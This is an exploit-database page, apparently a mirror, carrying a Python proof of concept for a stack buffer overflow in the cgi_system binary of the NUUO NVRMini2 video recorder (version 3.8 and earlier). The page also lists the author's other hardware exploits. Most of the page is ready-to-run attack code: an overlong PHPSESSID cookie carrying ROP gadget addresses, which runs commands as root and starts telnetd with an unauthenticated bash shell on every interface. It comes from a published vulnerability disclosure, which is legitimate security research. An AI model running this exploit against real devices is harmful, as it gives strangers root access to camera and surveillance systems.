Become a patron and gain access to the dashboard, Schedule scans, API and Search

Search for hundreds of thousands of exploits

"NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)"

Author

Exploit author

"Jacob Baines"

Platform

Exploit platform

hardware

Release date

Exploit published date

2018-09-18

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
# Exploit Title: NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)
# Date: 2018-09-17
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.nuuo.com/
# Device: NRVMini2
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Versions: 3.8.0 and below
# Tested Against: 03.07.0000.0011 and 03.08.0000.0005
# Tested on: Ubuntu and OSX
# CVE: N/A
# TRA: https://www.tenable.com/security/research/tra-2018-25
# Description:

# A stack buffer overflow exists in the cgi_system binary. The error occurs
# due to lack of bounds checking on the PHPSESSID value before and when
# it is passed to sprintf in order to generate the session id file name.
# As written, this exploit enables Telnet.

# Executes a command via the stack buffer overflow in cookie parsing. The command
# is executed via 'system' as root. The overlow logic is like so:
#
# address 1: 405e2e34 - load system into r3 and address 2 into lr
#
# .text:000D0E34 0F 48 BD E8                 LDMFD   SP!, {R0-R3,R11,LR}
# .text:000D0E38 1E FF 2F E1                 BX      LR
#
# address 2: 406037cc - load the system command into r0. Jump to system.
#
# .text:000F17CC 0D 00 A0 E1                 MOV     R0, SP
# .text:000F17D0 33 FF 2F E1                 BLX     R3
#
# [   address 1  ][       r0     ][      r1      ][      r2      ][  r3 system   ][      r11     ][  LR - addr2  ][ system command ]
# \x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40touch /tmp/lolwat

# PoC

import requests
import socket
import sys

def stack_buffer_overflow(command, ip, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print '[+] Executing %s on %s:%s...' % (command, ip, port)
    sock.connect((ip, int(port)))
    exec_request = ('GET /cgi-bin/cgi_system?cmd=portCheck HTTP/1.1\r\n' +
                    'Host: ' + ip + ':' + port + '\r\n' +
                    'Accept: */*\r\n' +
                    'Cookie: PHPSESSID=982e6c010064b3878a4b793bfab8d2d2' +
                    'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAABBBBCCCCDD' +
                    '\x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40' + command +
                    '\r\n\r\n')
    sock.sendall(exec_request)
    data = sock.recv(1024)
    sock.close()

    # We should get a 500 Internal error in response
    return data.find('500') != -1

# Quickly tries to grab the version of the target. If the target is
# using anything other than 3.7 or 3.8 then we'll bail out since
# haven't tested on any other targets

def check_target(ip, port):
    index = requests.get('http://' + ip + ':' + port + "/upgrade_handle.php?cmd=getcurrentinfo")
    return (index.text.find('<Titan>03.08') != -1 or index.text.find('<Titan>03.07') != -1)

if __name__ == "__main__":

    if (len(sys.argv) != 3):
        print "Usage: python nvrmini2_enable_telnet.py <ipv4 address> <port>"
        sys.exit(1)

    ip = sys.argv[1]
    port = sys.argv[2]

    if int(port) > 65535:
        print('[-] Invalid port parameter')
        sys.exit(0)

    if len(ip.split('.')) != 4:
        print('[-] Invalid IP address parameter')
        sys.exit(0)

    print '[+] Checking for a valid target...'
    if (check_target(ip, port) == False):
        print('[-] The target is not a NVRMini2 or its using an untested version.')
        sys.exit(0)
    print '[+] Valid target!'

    if (stack_buffer_overflow('mount -t devpts devpts /dev/pts', ip, port) == False):
        print('[-] Mount failed')
        sys.exit(0)

    if (stack_buffer_overflow('/bin/sh -c "/usr/sbin/telnetd -l /bin/bash -b 0.0.0.0"&', ip, port) == False):
        print('[-] telnetd bind failed')
        sys.exit(0)

    print('[+] Success!')
Release Date Title Type Platform Author
2020-04-17 "Cisco IP Phone 11.7 - Denial of service (PoC)" webapps hardware "Jacob Baines"
2020-04-08 "Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)" webapps hardware "Jacob Baines"
2020-03-31 "Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection" webapps hardware "Jacob Baines"
2020-03-31 "Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection" webapps hardware "Jacob Baines"
2020-03-24 "UCM6202 1.0.18.13 - Remote Command Injection" webapps hardware "Jacob Baines"
2019-10-31 "MikroTik RouterOS 6.45.6 - DNS Cache Poisoning" remote hardware "Jacob Baines"
2019-07-30 "Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming" webapps hardware "Jacob Baines"
2019-05-03 "Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection" webapps hardware "Jacob Baines"
2019-02-21 "MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass" remote hardware "Jacob Baines"
2019-02-11 "Indusoft Web Studio 8.1 SP2 - Remote Code Execution" remote multiple "Jacob Baines"
2018-12-21 "Netatalk < 3.1.12 - Authentication Bypass" remote multiple "Jacob Baines"
2018-10-10 "MicroTik RouterOS < 6.43rc3 - Remote Root" remote hardware "Jacob Baines"
2018-09-18 "NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)" remote hardware "Jacob Baines"
2017-06-14 "HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution" remote hardware "Jacob Baines"
2016-10-20 "MiCasaVerde VeraLite - Remote Code Execution" remote hardware "Jacob Baines"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/45427/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.